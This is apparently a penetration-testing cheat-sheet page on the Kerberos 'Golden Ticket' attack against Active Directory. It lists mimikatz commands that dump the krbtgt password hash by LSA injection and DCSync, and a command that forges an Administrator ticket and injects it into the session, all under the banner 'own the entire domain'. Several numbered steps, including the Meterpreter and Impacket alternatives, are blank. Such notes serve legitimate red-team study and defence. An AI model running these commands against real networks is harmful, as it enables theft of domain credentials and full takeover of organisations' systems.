githubEdit

Golden Ticket

GOLDEN TICKET

Dump krbtgt hash to own the entire domain!

1)

mimikatz.exe

2)

privilege::debug

3)

lsadump::lsa /inject /name:krbtgt

4)

lsadump::lsa /patch

5)

lsadump::trust /patch

6)

lsadump::dcsync /user:krbtgt

7)

kerberos::purge

8)

9)

10)

Alternate method: Meterpreter shell

Get information for golden ticket

1)

2)

Forge a Golden Ticket

3)

4)

5)

6)

7)

Authenticate with psexec impacket (Linux)

8)

Alternate Method: Impacket Ticketer

1)

2)

3)

Golden Ticket

Command
Description

lsadump::dcsync /domain:eagle.local /user:krbtgt

Command used in mimikatz to DCSync and dump the krbtgt password hash

Get-DomainSID

Cmdlet from PowerView used to obtain the SID value of the domain.

golden /domain:eagle.local /sid:<domain sid> /rc4:<rc4 hash> /user:Administrator /id:500 /renewmax:7 /endin:8 /ptt

Command used in mimikatz to forge a golden ticket for the Administrator account and pass the ticket to the current session

klist

Last updated